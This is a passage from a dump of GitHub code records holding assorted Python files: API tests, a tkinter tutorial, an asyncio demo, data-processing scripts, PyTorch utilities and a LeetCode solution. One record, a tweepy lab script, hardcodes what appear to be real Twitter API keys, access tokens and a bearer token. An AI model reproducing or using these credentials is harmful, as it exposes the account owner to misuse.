requests\n\nclass TestContactsAPI(unittest.TestCase):\n\n def setUp(self):\n # Configurar a URL base da API\n self.base_url = \"http://localhost:5000\"\n # Dados do contato de exemplo para testes\n self.data = {\n \"nome\": \"João\",\n \"sobrenome\": \"Silva\",\n \"email\": \"joao@example.com\",\n \"telefone\": \"(11) 98765-4321\"\n }\n\n def test_create_contact(self):\n # Testar a criação de um novo contato\n # Remova o campo \"id\" dos dados do contato antes de enviar a requisição\n self.data.pop(\"id\", None)\n response = requests.post(f\"{self.base_url}/contatos\", json=self.data)\n self.assertEqual(response.status_code, 201)\n self.assertIn(\"id\", response.json())\n\n\n def test_read_contact(self):\n # Testar a leitura de um contato pelo ID\n response = requests.get(f\"{self.base_url}/contatos/1\")\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"nome\"], \"João da Silva\")\n\n def test_update_contact(self):\n # Testar a atualização de um contato pelo ID\n data = {\n \"nome\": \"João da Silva\",\n \"email\": \"joao.silva@example.com\"\n }\n response = requests.put(f\"{self.base_url}/contatos/1\", json=data)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"message\"], \"Contato atualizado com sucesso\")\n\n def test_delete_contact(self):\n # Testar a exclusão de um contato pelo ID\n response = requests.delete(f\"{self.base_url}/contatos/1\")\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json()[\"message\"], \"Contato excluído com sucesso\")\n\n def test_search_contact(self):\n # Testar a pesquisa de contatos por parte do nome\n search_name = \"Jo\"\n response = requests.get(f\"{self.base_url}/contatos/search?nome={search_name}\")\n self.assertEqual(response.status_code, 200)\n self.assertIsInstance(response.json(), list)\n self.assertTrue(len(response.json()) > 0)\n\nclass OrderedTestLoader(unittest.TestLoader):\n def getTestCaseNames(self, testCaseClass):\n test_names = super().getTestCaseNames(testCaseClass)\n ordered_test_names = [\n \"test_create_contact\",\n \"test_read_contact\",\n \"test_update_contact\",\n \"test_search_contact\",\n \"test_delete_contact\",\n ]\n return sorted(test_names, key=lambda x: ordered_test_names.index(x))\n\nif __name__ == '__main__':\n unittest.main(testLoader=OrderedTestLoader())\n","repo_name":"MykleBR/API2.0","sub_path":"TEST/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28994363568","text":"#Tutorial Walkthrough with YouTube's Sentdex\n\n#{Videos Complete:\n#1\n\n\n\n\n#{Link: https://pythonprogramming.net/object-oriented-programming-crash-course-tkinter/?completed=/tkinter-depth-tutorial-making-actual-program/}\n\n\n\nimport tkinter as tk \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#{NOTE: What is OOP?>Object Oriented Program uses Instances of Objects sometimes generated from Class templates.}\nclass SeaofBTCapp(tk.Tk): \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#{Inheritance goes here. Other Classes}\t\n\tdef __init__(self, *args, **kwargs):\t\t\t\t\t\t\t\t\t\t\t#{*args = Short for Arguments, can pass any number of variables.; *qwargs = Usually for dictionaries. 99.9999999999999% of the time. } \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#We did not rename tk.Tk as Root, subsequently root does not equal r. 
Change later?\n\n\t\ttk.Tk.__init__(self, *args, **kwargs)\t\t\t\t\t\t\t\t\t\t\t#{always use a container to populate.}\n\t\tcontainer = tk.Frame(self)\n\n\t\tcontainer.pack(side=\"top\",fill=\"both\",expand=True)\n\n\t\tcontainer.grid_rowconfigure(0, weight=1)\t\t\t\t\t\t\t\t\t\t#Weight = Priority\n\t\tcontainer.grid_columnconfigure(0, weight=1)\n\t\tself.frames = {}\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n\n\t\tframe = StartPage(container, self)\n\n\t\tself.frames[StartPage] = frame\n\n\t\tframe.grid(row=0,column=0,sticky=\"nsew\")\n\n\n\n","repo_name":"CodyLRobertson/TUTORIAL_Tkinter_sentdex","sub_path":"Sentdex_Tkinter_python_walkthrough.py","file_name":"Sentdex_Tkinter_python_walkthrough.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27220905833","text":"from time import sleep\nimport asyncio\n\nasync def very_long_running_task():\n\tprint(f'very_long_running_task started...')\n\tawait asyncio.sleep(3)\n\tprint(f'very_long_running_task finished!')\n\nasync def normal_task():\n\tprint(f'normal_task started...')\n\tawait asyncio.sleep(2)\n\tprint(f'normal_task finished!')\n\nasync def flash_task():\n\tprint(f'flash_task started...')\n\tawait asyncio.sleep(1)\n\tprint(f'flash_task finished!')\n\nasync def runner():\n\ttask_list = [very_long_running_task]*3 + [normal_task]*3 + [flash_task]*3\n\ttask_list = [asyncio.create_task(task(), name=f'{task.__name__}') for task in task_list]\n\tdone, pending = await asyncio.wait(task_list, return_when=asyncio.FIRST_COMPLETED)\n\tfor task in pending:\n\t\tprint(task)\n\t\ttask.cancel()\n\n\nasyncio.run(runner())","repo_name":"dremdem/gcaw","sub_path":"test_real_async.py","file_name":"test_real_async.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11133567963","text":"#Lab 2\n#1-\tConnect to Twitter account and Extract first 100 tweets from it in a file\n\nimport tweepy\nimport pandas as pd\nimport csv\nimport re\nimport string\nimport preprocessor as p\n\nconsumer_key = \"QvPhWYeUMHVcFtM4UjFk7gdrm\"\nconsumer_secret = \"XP0b3lT8FyX0drEYeb6qGiZbUfzXmfNcuHN34qgRWf2XZbsWhT\"\naccess_key = \"858886404591333376-5PUlvH7SIRkKXyWOQDdWLnPXQdR6vZC\"\naccess_secret = \"atBJYZ5jU3Ka8LeKwp7Df6VQQOFGtO0djAokxHoTUZmfj\"\nbearer_key=\"AAAAAAAAAAAAAAAAAAAAAICPlQEAAAAAFkHSzq2jnwMEpf8wmoNUDgKM%2Fzg%3De4kQBj97JAvkFeLsVoix7h6s8HVfQxRJtPduZ1gBF4lE4isUTm\"\n\n\n\n#make a connection with API v2\nimport requests\n\nclient = tweepy.Client( bearer_token=bearer_key,\n                        consumer_key=consumer_key,\n                        consumer_secret=consumer_secret,\n                        access_token=access_key,\n                        access_token_secret=access_secret,\n                        return_type = requests.Response,\n                        wait_on_rate_limit=True)\n\n\n#Defining a query\nquery = 'from:joonsquotes -is:retweet'\n# exclude retweets and limit of tweets to 100\n\n# get max. 
100 tweets\ntweets = client.search_recent_tweets(query=query,tweet_fields=['author_id', 'created_at'],max_results=100)\n\n#conversion to pandas dataframe\nimport pandas as pd\n\n# Save data as dictionary\ntweets_dict = tweets.json()\n\n# Extract \"data\" value from dictionary\ntweets_data = tweets_dict['data']\n\n# Transform to pandas Dataframe\ndf = pd.json_normalize(tweets_data)\n\nprint(df)\n\n#save\ndf.to_csv(\"namjoon_lyrics_tweets.csv\")","repo_name":"Himm11/NLPbasic","sub_path":"Lab_2.py","file_name":"Lab_2.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"8393681754","text":"import pandas as pd\r\nimport time\r\nimport tkinter as tk\r\nfrom tkinter import filedialog\r\nimport os\r\nimport json\r\n\r\nroot = tk.Tk()\r\nroot.withdraw()\r\nfolder_path = filedialog.askdirectory()\r\nsubfolders = os.listdir(folder_path)\r\nprint('\\nProcessing...\\n')\r\nt1 = time.time()\r\n#--------------------------------------------------------------------------------------------------------\r\nt1 = -1.6\r\nt2 = 180\r\nA = 12.5\r\ndef condition1(df,t1,t2):\r\n try:\r\n df2 = df[(df['linear_acceleration.x_filtered'] < t1) & (df['msg.brake'] > t2)]\r\n # print(df)\r\n stamp = []\r\n loc1 = []\r\n t_list = list(df2['Time'])\r\n if t_list != []:\r\n stamp.append(t_list[0])\r\n for i in range(len(t_list)):\r\n if i == len(t_list)-1:\r\n break\r\n if t_list[i+1]- t_list[i] > 5:\r\n stamp.append(t_list[i+1])\r\n print('stamp1: ',stamp)\r\n loc1 = df.index[df['Time'].isin(stamp)].tolist()\r\n print('loc1: ', loc1)\r\n df.loc[loc1,'incident_flag'] = 1\r\n else:\r\n pass\r\n except KeyError as e:\r\n print(e)\r\n stamp = []\r\n loc1 = []\r\n return stamp, loc1\r\n#--------------------------------------------------------------------------------------------------------\r\ndef condition2(df,subfolder,A):\r\n try:\r\n # map = pd.read_csv(os.path.join(folder_path, subfolder + r\"/waypoints_map.csv\"), index_col=0)\r\n subfolder = subfolder.replace('-','')\r\n subfolder = subfolder.replace('Chula','CU')\r\n vehicle,operator,location,date = subfolder.split('_')\r\n with open(f'D:\\FOOH\\Senior_Project\\map\\waypoint_{vehicle}_{location}.csv') as f:\r\n map = pd.read_csv(f)\r\n # map = map[map['event_flag'] != 0]\r\n x = list(map['x'])\r\n y = list(map['y'])\r\n\r\n df['in_station'] = 0\r\n shift_msg = df['msg.mode'].shift(periods=1)\r\n df2 = df[df['msg.mode'] != shift_msg]\r\n df2 = df2.iloc[1:]\r\n\r\n # A = 5 # bus stop area\r\n for i in range(len(x)):\r\n df2.loc[(abs((df2['pose.position.x']-x[i])) < A) & (abs((df2['pose.position.y']-y[i])) < A),'in_station'] = 1\r\n # print(df)\r\n stamp = df2[df2['in_station'] == 0]['Time']\r\n stamp = list(stamp)\r\n print('stamp2:', stamp)\r\n loc2 = df2.index[df2['in_station'] == 0].tolist()\r\n print('loc2: ', loc2)\r\n df.loc[loc2,'incident_flag'] = 1\r\n # remove mode switch at the start\r\n try:\r\n x0 = df['pose.position.x'].iat[0]\r\n y0 = df['pose.position.y'].iat[0]\r\n x1 = df['pose.position.x'].iat[loc2[0]]\r\n y1 = df['pose.position.y'].iat[loc2[0]]\r\n if abs(x1-x0) < A and abs(y1-y0) < A:\r\n stamp.pop(0)\r\n loc2.pop(0)\r\n except:\r\n pass\r\n except (FileNotFoundError, KeyError) as e:\r\n print(e)\r\n stamp = []\r\n loc2 = []\r\n return stamp, loc2\r\n#--------------------------------------------------------------------------------------------------------\r\nstamp_dict = {}\r\nfor subfolder in subfolders:\r\n try:\r\n df = 
pd.read_csv(os.path.join(folder_path, subfolder + r\"/merged_filtered_df.csv\"), index_col=0)\r\n print(subfolder)\r\n df['incident_flag'] = 0\r\n stamp1,loc1 = condition1(df,t1,t2)\r\n stamp2,loc2 = condition2(df,subfolder,A)\r\n stamp_dict[subfolder] = {}\r\n stamp_dict[subfolder]['Condition1'] = stamp1\r\n stamp_dict[subfolder]['Condition2'] = stamp2\r\n stamp_dict[subfolder]['loc1'] = loc1\r\n stamp_dict[subfolder]['loc2'] = loc2\r\n if 'in_station' in list(df.columns):\r\n df = df.drop(columns = 'in_station')\r\n df.to_csv(os.path.join(folder_path, subfolder + r\"/merged_filtered_df.csv\"))\r\n print('------ DONE ------\\n')\r\n except FileNotFoundError as e:\r\n print(subfolder, e, '\\n*Skip\\n')\r\n \r\nprint(stamp_dict)\r\nwith open(f\"Incidents_t1[{t1}]_t2[{t2}]_A[{A}].json\", \"w\") as f: \r\n jsonString = json.dumps(stamp_dict, indent=4)\r\n f.write(jsonString)\r\n \r\nprint('\\n'+ '***'*10**2 + '\\n')\r\n\r\n","repo_name":"kopkap345/streamlit_test","sub_path":"Condition1-2.py","file_name":"Condition1-2.py","file_ext":"py","file_size_in_byte":4178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22269850540","text":"import os\nfrom os import path\nimport random\nimport argparse\n\nfrom misc import module_utils\nfrom config import template\n\nimport torch\nimport numpy as np\n\n\ndef parse():\n default_parse = [\n 'default_general',\n 'default_data',\n 'default_model',\n 'default_loss',\n 'default_trainer',\n 'default_optimizer',\n 'default_log',\n 'default_gans',\n 'sr_model',\n 'cfg_srwarp',\n ]\n parser = argparse.ArgumentParser()\n for option in default_parse:\n group = parser.add_argument_group(option)\n m = module_utils.load_with_exception(option, 'config')\n m.add_argument(group)\n\n cfg = parser.parse_args()\n template.set_template(cfg.template, cfg)\n\n if cfg.override is not None:\n # --args1 [value1] -args2 [value2] ...\n args = cfg.override.split('--')[1:]\n for kv in args:\n kv_split = kv.split(' ')\n k = kv_split[0]\n v = kv_split[1]\n if v.isdecimal():\n v = int(v)\n elif v.lower() == 'true':\n v = True\n elif v.lower() == 'false':\n v = False\n\n print('{}: {} is overrided to {}'.format(k, getattr(cfg, k), v))\n setattr(cfg, k, v)\n\n # Resume from the latest checkpoint\n if cfg.resume == 'self':\n cfg.resume = path.join('..', 'experiment', cfg.save, 'latest.ckpt')\n cfg.reset = False\n\n if cfg.seed == -1:\n cfg.seed = random.randint(0, 2**31 - 1)\n\n split = cfg.save.split(os.sep)\n if len(split) == 2:\n cfg.save, cfg.ablation = split\n\n random.seed(cfg.seed)\n np.random.seed(cfg.seed)\n torch.manual_seed(cfg.seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed_all(cfg.seed)\n\n if cfg.linear > 1:\n cfg.batch_size *= cfg.linear\n cfg.lr *= cfg.linear\n cfg.print_every = max(cfg.print_every // cfg.linear, 1)\n cfg.test_every = max(cfg.test_every // cfg.linear, 1)\n\n return cfg\n\ndef parse_namespace(cfg, *args):\n '''\n Get *args from cfg.\n\n Args:\n cfg (napespace): Target namespace.\n *args (list of str): Argument names to be parsed.\n\n Example::\n >>> parse_namespace(test, 'a', 'b', 'c')\n >>> {'a': cfg.a, 'b': cfg.b, 'c': cfg.c}\n '''\n ret = {}\n for arg in args:\n if hasattr(cfg, arg):\n ret[arg] = getattr(cfg, arg)\n\n return ret\n\n","repo_name":"sanghyun-son/srwarp","sub_path":"src/config/get_config.py","file_name":"get_config.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"83"} 
+{"seq_id":"3063261303","text":"import torch\n\nfrom speechbrain.nnet.losses import length_to_mask\n\n\ndef undo_padding_tensor(batch, lengths):\n \"\"\"\n A tensor version of undo_padding. Return a list of tensors, instead of a list of lists.\n\n Parameters\n ----------\n batch : torch.Tensor\n (B, T, *)\n lengths : torch.Tensor\n (B)\n\n Returns\n -------\n as_list : list\n A list of unpadded tensors.\n\n \"\"\"\n batch_max_len = batch.shape[1]\n as_list = []\n for seq, seq_length in zip(batch, lengths):\n actual_size = int(torch.round(seq_length * batch_max_len))\n seq_true = seq.narrow(0, 0, actual_size)\n as_list.append(seq_true)\n return as_list\n\n\ndef apply_weight(x, weight):\n \"\"\"\n Apply weight using torch.bmm\n\n Parameters\n ----------\n x : torch.tensor\n (B, T, N, C) or (B, T, N * C)\n weight : torch.tensor\n (B, T, N)\n\n Returns\n -------\n weighted_x : torch.tensor\n (B, T, C)\n \"\"\"\n B, T, N = weight.shape\n C = x.shape[-1]\n if x.ndim == 3:\n C = C // N\n x = x.view(B, T, N, C)\n\n # reshape tensors\n x = x.view(B * T, N, C)\n weight = weight.view(B * T, 1, N)\n\n # apply weight\n weighted_x = torch.bmm(weight, x)\n\n # reshape weighted x\n weighted_x = weighted_x.view(B, T, C)\n\n return weighted_x\n\n\ndef apply_lens_to_loss(loss, lens, reduction='mean'):\n \"\"\"\n Compute the mean loss of a batch while considering the lengths of each sample.\n\n Parameters\n ----------\n loss : torch.tensor\n (B, T, C)\n lens : torch.Tensor\n (B)\n reduction : str\n 'mean', 'batchmean' or 'batch'\n\n Returns\n -------\n loss : torch.tensor\n Single value. Mean loss.\n \"\"\"\n # compute and apply mask\n mask = torch.ones_like(loss)\n length_mask = length_to_mask(lens * mask.shape[1], max_len=mask.shape[1])\n length_mask = length_mask.type(mask.dtype)\n # handle any dimensionality of input\n while len(length_mask.shape) < len(mask.shape):\n length_mask = length_mask.unsqueeze(-1)\n mask *= length_mask\n\n # compute loss\n loss = loss * mask\n B = loss.size(0)\n if reduction == 'mean':\n loss = loss.sum() / torch.sum(mask)\n elif reduction == 'batchmean':\n loss = loss.sum() / B\n elif reduction == 'batch':\n loss = loss.reshape(B, -1).sum(dim=-1) / mask.reshape(B, -1).sum(dim=-1)\n\n return loss\n\n\ndef resample_tensor(source, target, dim):\n \"\"\"\n Resample the time dimension of source tensor to match target tensor.\n\n Parameters\n ----------\n source : torch.Tensor\n The tensor to be resampled.\n target : torch.Tensor\n The target tensor.\n dim : int\n The time dimension.\n\n Returns\n -------\n resampled_source: torch.Tensor\n (B, T, *)\n \"\"\"\n source_shape = source.shape\n source_ind = [slice(None) for _ in source_shape]\n\n source_T = source.shape[dim]\n target_T = target.shape[dim]\n\n factor = round(target_T // source_T)\n if not factor > 0:\n raise ValueError(f'non-positive factor for input lengths: {source_T} and {target_T}')\n\n # repeat the values in source tensor\n resampled_source = torch.repeat_interleave(source, factor, dim=dim)\n\n # check shape difference\n shape_diff = resampled_source.shape[dim] - target_T\n diff_tol = 3\n if not -diff_tol <= shape_diff <= diff_tol:\n raise ValueError(f'length difference between resampled tensor and target tensor is too large: {shape_diff}')\n\n if shape_diff > 0: # remove extra values from resampled tensor\n source_ind[dim] = slice(target_T)\n resampled_source = resampled_source[source_ind]\n elif shape_diff < 0: # pad resampled tensor with zeros\n zeros = torch.zeros_like(resampled_source)\n resampled_ind = 
[slice(None) for _ in resampled_source.shape]\n        resampled_ind[dim] = slice(-shape_diff)\n        zeros = zeros[resampled_ind]\n        resampled_source = torch.cat([resampled_source, zeros], dim=dim)\n\n    assert resampled_source.shape[dim] == target_T\n\n    return resampled_source\n\n\ndef boundary_seq_to_seg_seq(boundary_seq):\n    \"\"\"\n    Convert boundary sequence into segmentation sequence.\n\n    Parameters\n    ----------\n    boundary_seq : torch.Tensor\n        Boundary sequence.\n\n    Returns\n    -------\n    seg_seq : torch.Tensor\n        Segmentation sequence.\n\n    \"\"\"\n    boundary_index_seq = torch.where(boundary_seq == 1)[0]\n    # boundary_index_seq = torch.cat([boundary_index_seq, torch.tensor(len(boundary_seq))])\n    seg_seq = []\n    for i in range(len(boundary_index_seq) - 1):\n        seg_seq.append([boundary_index_seq[i], boundary_index_seq[i + 1]])\n    seg_seq.append([boundary_index_seq[-1], len(boundary_seq)])\n\n    return torch.tensor(seg_seq)\n\n\ndef compute_categorical_ll(dist, sampled):\n    \"\"\"\n    Compute the log-likelihood for a categorical distribution.\n\n    Parameters\n    ----------\n    dist : torch.distributions.Categorical\n        The categorical distribution.\n\n    sampled : torch.Tensor\n        Sampled data.\n\n    Returns\n    -------\n    ll : torch.Tensor\n        Log-likelihood.\n    \"\"\"\n    logits = dist.logits\n    if logits.shape != sampled.shape:\n        raise ValueError(f'inconsistent shapes: {logits.shape} != {sampled.shape}')\n\n    ll = torch.bmm(logits.reshape(logits.shape[0] * logits.shape[1], 1, -1),\n                   sampled.reshape(logits.shape[0] * logits.shape[1], -1, 1)).reshape(logits.shape[0], logits.shape[1])\n\n    return ll","repo_name":"weiwei-ww/ML-VAE","sub_path":"src/utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"21446438691","text":"import phenotypes_pb2\nimport sys\nimport polycubes\nimport os\n\ndef checkSettings(a, b):\n    msg = 'Incompatible datasets'\n    assert len(set(d.nColors for d in [a, b])) == 1, msg\n    assert len(set(d.nCubeTypes for d in [a, b])) == 1, msg\n    assert len(set(d.nDimensions for d in [a, b])) == 1, msg\n    assert len(set(d.assemblyMode for d in [a, b])) == 1, msg\n\ndef readDatasets(paths):\n    dataset = phenotypes_pb2.Dataset()\n    for i, path in enumerate(paths):\n        tmp = phenotypes_pb2.Dataset()\n        with open(path, \"rb\") as f:\n            tmp.ParseFromString(f.read())\n        if i>0:\n            checkSettings(dataset, tmp)\n        dataset.MergeFrom(tmp)\n    return dataset\n\ndef merge(outdir):\n    files = []\n    for r, _, fs in os.walk(outdir):\n        files = [f for f in fs if \".bin\" in f]\n        root = r\n        break\n    print(\"Merging files: {}\".format(files))\n    dataset = readDatasets(os.path.join(root, f) for f in files)\n\n    phenos = {}\n    for key, pheno in dataset.phenotypes.items():\n        sizeId, idx, pid = key.rsplit('_', maxsplit=2)\n        if not sizeId in phenos:\n            phenos[sizeId] = []\n        phenos[sizeId].append({'key': key, 'pid': pid, 'rule': pheno.rules[0]})\n    phenos\n\n    mergedDataset = phenotypes_pb2.Dataset()\n    for sizeId, phenolist in phenos.items():\n        groups = []\n        for p in phenolist:\n            foundGroup = False\n            for group in groups:\n                if (p['pid'] not in group['pids'] and \n                    polycubes.checkEquality(p['rule'], group['rule'], dataset.assemblyMode)\n                ):\n                    foundGroup = True\n                    group['keys'].append(p['key'])\n                    group['pids'].append(p['pid'])\n                    break\n            if not foundGroup:\n                groups.append({\n                    'keys': [p['key']],\n                    'pids': [p['pid']],\n                    'rule': p['rule']\n                })\n\n        for i, group in enumerate(groups):\n            sample = dataset.phenotypes[group['keys'][0]]\n            key = 
\"{}_{}_{}\".format(sample.size, i, os.getpid())\n p = mergedDataset.phenotypes[key]\n p.size = sample.size\n p.dim1 = sample.dim1\n p.dim2 = sample.dim2\n p.dim3 = sample.dim3\n for key in group['keys']:\n p.rules.extend(dataset.phenotypes[key].rules)\n\n for f in files:\n os.renames(os.path.join(root, f), os.path.join(root, 'merged', f))\n \n outpath = os.path.join(root, 'phenos_{}.bin'.format(os.getpid()))\n with open(outpath, \"wb\") as f:\n f.write(dataset.SerializeToString())\n print(\"Saved merged dataset as {}\".format(outpath))\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n merge(sys.argv[1])\n else:\n print(\"Please provide a path to an out directory\")\n merge('cpp/out')","repo_name":"Akodiat/polycubes","sub_path":"py/mergeProtobuf.py","file_name":"mergeProtobuf.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"45281060023","text":"from expipe_plugin_cinpla.imports import *\nfrom expipe_plugin_cinpla.scripts import adjust\nfrom . import utils\nfrom datetime import datetime as dt\n\n\ndef attach_to_cli(cli):\n @cli.command('adjust',\n short_help='Parse info about drive depth adjustment')\n @click.argument('entity-id', type=click.STRING)\n @click.option('--date',\n type=click.STRING,\n help=('The date of the surgery format: \"dd.mm.yyyyTHH:MM\" ' +\n 'or \"now\".'),\n )\n @click.option('-a', '--adjustment',\n multiple=True,\n callback=utils.validate_adjustment,\n help=('The adjustment amount on given anatomical location ' +\n 'given as '),\n )\n @click.option('--index',\n type=click.INT,\n help=('Index for module name, this is found automatically ' +\n 'by default.'),\n )\n @click.option('--init',\n is_flag=True,\n help='Initialize, retrieve depth from surgery.',\n )\n @click.option('-d', '--depth',\n multiple=True,\n callback=utils.validate_depth,\n help=('The depth given as e.g. 
' +\n ' (omit <>).'),\n )\n @click.option('-u', '--user',\n type=click.STRING,\n help='The experimenter performing the adjustment.',\n )\n @click.option('-y', '--yes',\n is_flag=True,\n help='No query for correct adjustment.',\n )\n @click.option('--overwrite',\n is_flag=True,\n help='Overwrite existing action',\n )\n def _register_adjustment(entity_id, date, adjustment, user, index, init,\n depth, yes, overwrite):\n adjust.register_adjustment(\n project, entity_id, date, adjustment, user, index, init,\n depth, yes, overwrite)\n","repo_name":"CINPLA/expipe-plugin-cinpla","sub_path":"expipe_plugin_cinpla/cli/adjust.py","file_name":"adjust.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"23271859314","text":"import sys\nimport os\nfrom core import src\nimport cv2 as cv\n\n\"\"\"\n@author RansySun\n@create 2019-10-04-10:41\n\"\"\"\nsys.path.append(\n os.path.dirname(os.path.abspath(__file__))\n)\n\n\ndef play_video():\n # 读取视频\n cap = cv.VideoCapture(r'G:\\方优酷\\fangyouiku02\\youku_client\\db\\upload_movies\\1服务端注册功能封装.mp4')\n while cap.isOpened():\n ret, frame = cap.read()\n print(cap.read())\n if not ret:\n print(\"无法接收帧,流结束,正在退出\")\n break\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n cv.imshow('frame', gray)\n if cv.waitKey(1) == ord('q'):\n break\n cap.release()\n cv.destroyAllWindows()\n\n\nplay_video()\n\nif __name__ == '__main__':\n # 客户端启动入口\n src.run()\n","repo_name":"RandySun01/Videomanage_sys","sub_path":"youku_client/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"35870466330","text":"from sklearn.metrics import roc_auc_score, f1_score\n\nimport numpy as np, json, argparse, time\nfrom pprint import pprint\nimport logging.config\nimport os.path as osp\nimport sys\n\nimport torch\n\nfrom dataload import pred_triple\n\nfrom torch_geometric.nn import Node2Vec\nfrom apex import amp\n\nclass Runner(object):\n\n def load_data(self):\n \n path = osp.join('.', 'data', self.p.dataset)\n self.train_data = pred_triple(path, split='train')[0]\n self.val_data = pred_triple(path, split='val')[0]\n self.test_data = pred_triple(path, split='test')[0]\n \n max_index = torch.max(self.train_data['edge_label_index'])\n \n mm = [False if self.val_data.edge_label_index[0][ind] > max_index \n or self.val_data.edge_label_index[1][ind] > max_index else True \n for ind in range(len(self.val_data.edge_label_index[0]))]\n \n nn = [False if self.test_data.edge_label_index[0][ind] > max_index \n or self.test_data.edge_label_index[1][ind] > max_index else True \n for ind in range(len(self.test_data.edge_label_index[0]))]\n \n self.val_data.edge_index = torch.cat((self.val_data.edge_label_index[0][mm], self.val_data.edge_label_index[1][mm])).reshape(2, -1)\n self.val_data.edge_label = self.val_data.edge_label[mm]\n \n self.test_data.edge_index = torch.cat((self.test_data.edge_label_index[0][nn], self.test_data.edge_label_index[1][nn])).reshape(2, -1)\n self.test_data.edge_label = self.test_data.edge_label[nn]\n \n \n \n def get_logger(self, name, log_dir, config_dir):\n\n config_dict = json.load(open( config_dir + 'log_config.json'))\n config_dict['handlers']['file_handler']['filename'] = log_dir + name.replace('/', '-').replace(':', '-')\n\n logging.config.dictConfig(config_dict)\n logger = logging.getLogger(name)\n\n std_out_format = '%(asctime)s - [%(levelname)s] - 
%(message)s'\n consoleHandler = logging.StreamHandler(sys.stdout)\n consoleHandler.setFormatter(logging.Formatter(std_out_format))\n logger.addHandler(consoleHandler)\n\n return logger\n\n\n def __init__(self, params):\n \n self.p = params\n self.logger = self.get_logger(self.p.name, self.p.log_dir, self.p.config_dir)\n \n self.logger.info(vars(self.p))\n pprint(vars(self.p))\n\n if self.p.gpu != '-1' and torch.cuda.is_available():\n self.device = torch.device('cuda')\n else:\n self.device = torch.device('cpu')\n\n self.load_data()\n self.model = self.add_model(self.p.model)\n # self.optimizer = self.add_optimizer()\n self.model, self.optimizer = amp.initialize(self.model, self.add_optimizer(), \n opt_level=\"O1\")\n self.loader = self.get_loader()\n\n\n def add_model(self, model):\n \n if model.lower() == 'node2vec': \n model = Node2Vec(self.train_data.edge_label_index,\n # torch.cat((train_data.edge_label_index, test_data.edge_label_index), dim=1), \n embedding_dim=self.p.embedding_dim, walk_length=self.p.walk_length,\n context_size=self.p.context_size, walks_per_node=self.p.walks_per_node,\n num_negative_samples=self.p.num_negative_samples, p=self.p.p, q=self.p.q, sparse=True)\n \n else: raise NotImplementedError\n\n model.to(self.device)\n return model\n\n\n def add_optimizer(self):\n\n return torch.optim.SparseAdam(list(self.model.parameters()), lr=self.p.lr)\n\n\n def get_loader(self):\n num_workers = 0 if sys.platform.startswith('win') else 4\n return self.model.loader(batch_size=self.p.batch_size, shuffle=True, num_workers=num_workers)\n\n\n def save_model(self, save_path):\n\n state = {\n 'state_dict' : self.model.state_dict(),\n 'optimizer' : self.optimizer.state_dict(),\n 'args' : vars(self.p)\n }\n torch.save(state, save_path)\n\n\n def load_model(self, load_path):\n state = torch.load(load_path)\n state_dict = state['state_dict']\n self.model.load_state_dict(state_dict)\n self.optimizer.load_state_dict(state['optimizer'])\n\n\n def decode(self, z, edge_label_index):\n # print(edge_label_index.shape)\n return (z[edge_label_index[0]] * z[edge_label_index[1]]).sum(\n dim=-1\n ) # product of a pair of nodes on each edge\n \n\n def predict(self, data):\n\n self.model.eval()\n\n with torch.no_grad():\n z = self.model()\n # mm = [True if data.edge_label_index[0][ind]< len(z) and data.edge_label_index[1][ind] =a[i]):\n days+=1\n g = 2*a[i]\n if(g>x):\n x = g\n continue\n #---------------------\n #For elements smaller\n t = a[i]\n while(t>0):\n #print(1)\n days+=1\n h = 2*(t-x)\n if(h= n, Alice can get all\n Or else, dp(i,m) = suffix[i] - min(dp(i + x, max(m,x)), for x in range(1,2*m+1)) \n '''\n\n @lru_cache(None)\n def dp(self, i, m):\n result = self.piles[i]\n if i + 2*m < self.n:\n optimize = float('inf')\n for x in range(1, 2*m+1):\n optimize = min(optimize, self.dp(i+x, max(m,x)))\n result -= optimize\n return result\n \n def stoneGameII(self, piles: List[int]) -> int:\n self.n, self.piles = len(piles), piles\n for i in range(self.n-2,-1,-1):\n self.piles[i] += self.piles[i+1]\n return self.dp(0,1)\n# @lc code=end\n\n","repo_name":"huikinglam02gmail/Leetcode_solutions","sub_path":"1140.stone-game-ii.py","file_name":"1140.stone-game-ii.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9895896273","text":"\"\"\"Repository management tasks powered by `invoke`.\nMore information on `invoke` can be found at [pyinvoke.org](http://www.pyinvoke.org/).\n\"\"\"\nimport logging\nimport 
